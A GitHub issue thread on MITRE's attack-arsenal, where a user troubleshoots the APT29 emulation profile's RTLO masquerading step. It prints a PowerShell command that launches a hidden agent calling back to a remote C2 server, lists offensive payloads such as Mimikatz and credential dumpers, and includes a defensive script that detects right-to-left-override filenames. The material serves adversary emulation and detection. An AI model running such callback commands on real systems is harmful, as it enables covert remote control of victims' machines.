mitre-attack / attack-arsenal

A collection of red team and adversary emulation resources developed and released by MITRE.
Apache License 2.0

Error on Day1 - RTLO Start Sandcat (T1036) #21

Closed Nexx1c closed 3 years ago

Nexx1c commented 3 years ago

Hi,

I'm getting an error stating that the payload wasn't found when running the ATT&CK Eval APT29 - Day 1 profile:

Sleep 3;$bin = Get-ChildItem *cod*scr*;$arguments = '-server "http://40.87.138.119:8888" -group "rtlo_group"';start-process -WindowStyle Hidden $bin.FullName.toString() -ArgumentList $arguments;if ($?) { write-host "Successfully completed RTLO execution. A new agent should appear"; exit 0;} else { write-host "Failure of RTLO execution."; exit 1;}
__________________________
Payload(s) not available: 

Most other actions seem to be working well: https://i.imgur.com/4z37FG5.png

The payload seems to exist in plugins/evals/payloads:

root@28323b9446f0:/usr/src/app/plugins/evals/payloads# ls
 2016_United_States_presidential_election_-_Wikipedia.html   StealToken.ps1            rar.exe                      stepSeventeen_zip.ps1
 File-Collection.ps1                                         cod.3aka.scr.exe          sandcat.go-windows           stepSixteen_SID.ps1
 Get-Screenshot.ps1                                          dmevals.local.pfx         sandcat.go-windows-upx       stepThirteen.ps1
 Invoke-BypassUACTokenManipulation.ps1                       invoke-winrmsession.ps1   schemas.ps1                  stepTwelve.ps1
 Invoke-Mimikatz.ps1                                         m.exe                     setup.py                     timestomp.ps1
 Invoke-PSInject.ps1                                         make_lnk.ps1              stepFifteen_wmi.ps1          update.ps1
 MITRE-ATTACK-EVALS.HTML                                     monkey.png                stepFourteen_bypassUAC.ps1   upload.ps1
 Modified-SysInternalsSuite.zip                              powerview.ps1             stepFourteen_credDump.ps1    wipe.ps1
 README.md                                                   ps.ps1                    stepSeventeen_email.ps1     ''$'\342\200\256''cod.3aka.scr.exe'

I'm running v2.6.6 in a Docker container, if that could be causing any issues?
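The last entry of the listing above is the RTLO payload: `ls` prints the octal escape `\342\200\256` for U+202E (RIGHT-TO-LEFT OVERRIDE), the character behind the T1036 masquerading step this issue is about. As an added example, not code from the issue or from the attack-arsenal project, the script below undoes GNU `ls` quoting and flags any name carrying Unicode bidi controls, showing both the real name and an approximation of how a file browser would render it; the sample listing is constructed from the last row above.

```python
import re

# Unicode bidirectional controls that can disguise a file's true extension (ATT&CK T1036).
# U+202E (RLO) is the one hidden in the "cod.3aka.scr.exe" payload from the listing.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}
_ANSI_ESCAPES = {"\\": b"\\", "'": b"'", "n": b"\n", "t": b"\t", "r": b"\r"}

# Constructed sample modelled on the final row of the payload listing in the issue.
SAMPLE_LS = "README.md  ps.ps1  stepSeventeen_email.ps1  ''$'\\342\\200\\256''cod.3aka.scr.exe'"


def unquote_ls_token(token: str) -> str:
    """Undo ls quoting such as ''$'\\342\\200\\256''cod.3aka.scr.exe' to recover the real name."""
    out = bytearray()
    i = 0
    while i < len(token):
        if token.startswith("$'", i):                      # ANSI-C quoting: \ooo are raw bytes
            m = re.match(r"\$'((?:\\.|[^'\\])*)'", token[i:])
            if not m:
                raise ValueError(f"unterminated $'...' in {token!r}")
            for esc in re.finditer(r"\\([0-7]{1,3})|\\(.)|(.)", m.group(1)):
                if esc.group(1):
                    out.append(int(esc.group(1), 8))
                elif esc.group(2):
                    out += _ANSI_ESCAPES.get(esc.group(2), esc.group(2).encode())
                else:
                    out += esc.group(3).encode()
            i += m.end()
        elif token[i] == "'":                               # plain single quotes: literal run
            j = token.index("'", i + 1)
            out += token[i + 1:j].encode()
            i = j + 1
        else:
            out += token[i].encode()
            i += 1
    return out.decode("utf-8", errors="replace")


def render_rlo(name: str) -> str:
    """Approximate a GUI's rendering: everything after an RLO (U+202E) is displayed reversed."""
    head, sep, tail = name.partition("\u202e")
    return head + tail[::-1] if sep else name


def audit_listing(listing: str):
    """Yield (real_name, rendered_name, controls) for every entry hiding bidi controls.
    Entries are whitespace-separated as in multi-column ls output (no names with spaces)."""
    for token in listing.split():
        name = unquote_ls_token(token)
        controls = [(i, BIDI_CONTROLS[c]) for i, c in enumerate(name) if c in BIDI_CONTROLS]
        if controls:
            yield name, render_rlo(name), controls


if __name__ == "__main__":
    for real, shown, ctrls in audit_listing(SAMPLE_LS):
        print(f"suspicious: {real!r} renders as {shown!r}; controls: {ctrls}")
```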

Nexx1c commented 3 years ago

Found the issue.... Just wrote the IP without http:// and :port when running the setup.py... -_-